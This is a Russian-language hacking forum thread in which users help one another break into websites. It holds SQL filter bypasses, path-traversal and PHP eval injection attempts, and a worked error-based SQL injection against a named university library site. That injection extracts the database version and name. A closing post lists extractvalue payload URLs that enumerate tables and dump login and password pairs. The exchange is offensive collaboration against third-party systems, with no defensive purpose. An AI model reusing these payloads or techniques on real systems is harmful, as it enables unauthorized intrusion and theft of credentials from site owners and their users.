Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    495
    Reputations:
    37
    попробуй /**/from/**/table_name--
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    SpaceWeb и это режет.

    Там только %0a вместо порбелов помогает.
     
    _________________________
    1 person likes this.
  3. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    149
    Likes Received:
    9
    Reputations:
    0
    Добрый вечер.
    Нашел уязвимость подобную этой
    https://forum.antichat.ru/showthread.php?t=10915

    В общем проблема такая.
    Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (список файлов в папке или залить свой кодес ). лично я не вижу в этой особой проблемы.
     
    _________________________
  5. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    можно ли обойти такой фильтр




    Code:
    if (strpos($_GET['f'], '..') === false) 
    {      
    $a = dirname(__FILE__);   
    echo file_get_contents( $a . $_GET['f']); 
    }

    я так понимаю нужен такой символ между точками который не должен нарушать сработку
    конструкции .X./ в nix системах
    тогда он пройдет через фильтр
    либо замена точек на что то другое еквивалентное им
     
  6. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    149
    Likes Received:
    9
    Reputations:
    0
    Не получилось через opendir.
    Пример как вставлял:
    &cmd=opendir("../");&highlight='.eval($_GET[cmd]).'
    ничего не выводит..
     
  7. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    https://rdot.org/forum/showpost.php?p=3323&postcount=16 - в помощь. :)
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    версию вывести возможно тут?

    _http://vkontakte.dj/index.php?option=com_fireboard&Itemid=41&catid=9&id=3378&func=view'
     
  9. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    я уже пробовал ети методы они не помогают
    но в описании функции file_get_contents есть интересное
    цитата с http://php.su/functions/?f=file_get_contents&choice=info


    из етого следует что функция file_get_contents в принципе должна понимать урл кодированую строку пути
    но по факту что то не работает
     
  10. ProFiLeR

    ProFiLeR New Member

    Joined:
    29 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Говорю по факту, что есть, на данный момент:
    1) самописный движок
    2) ссылка типа index.php?id=hats
    3) MySQL запрос не генерируется
    4) id используется в условии if'a ( if( $_GET['id'] == "hats" ) {…} )

    теперь вопрос, можно ли скормить параметру id спецсимвол ' (одинарную ковычку) и завершить if со своим последующим кодом, поставя знак комментария после своего кода, чтобы последующий код не мешал

    Например:
    1) .../index.php?id=hats'] == 'hats' && function(){ мой_код; return true;} ) { //
    2) тоесть, чтобы код изменился с
    if( $_GET['id'] == 'hats' ) {
    на
    if( 'hats' == 'hats' && function(){ мой_код; return true;} ) { // == "hats" ) {

    P.S. извините, что не тегую, т.к. пишу с мобильного
     
  11. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    ProFiLeR, нет.
     
  12. ProFiLeR

    ProFiLeR New Member

    Joined:
    29 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.

    Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).
     
  13. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    532
    Likes Received:
    61
    Reputations:
    53
    Error Number: 1064
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56

    и дальше идет листинг больщого Select Запроса.
    первый раз вообще вижу такую шляпу. крутится?
     
    #21793 justonline, 29 Jan 2013
    Last edited: 29 Jan 2013
  14. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1

    как правильно составлять запрос...?
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Нужен весь запрос, или хотя бы урл.

    Попробуй так

    ' and 1='1
    ' and 1='2

    И сравни результаты.
     
    _________________________
  16. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ни то ни другое не работает... Вот урл -
    http://lib.pntu.edu.ua/?module=vds*section-84
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    'and(1)='1 TRUE

    'and(2)='1 FALSE

    Режутся пробелы. Можно юзать только беспробельные варианты.

    Ещё чуток покручу - выложу тут запросы.

    UPD.

    'and(extractvalue(1,concat(0x3a,(select(@@version)))))='

    XPATH syntax error: ':5.1.49-3'

    'and(extractvalue(1,concat(0x3a,(select(database())))))='

    XPATH syntax error: ':lib_bd'
     
    _________________________
    #21797 BigBear, 30 Jan 2013
    Last edited: 30 Jan 2013
    1 person likes this.
  18. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    То есть дальше посимвольный перебор...?
    плюсую...)+
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Не надо посимвольного перебора.

    Я ж тебе докрутил до Error-Based. Теперь только через ошибку.

    Да тебе и этого выше крыши.
     
    _________________________
  20. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
    Короче по такой схеме крутить я так понял:

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))--

    или как тут

     
    #21800 LelouchMe, 30 Jan 2013
    Last edited: 30 Jan 2013
Loading...
Thread Status:
Not open for further replies.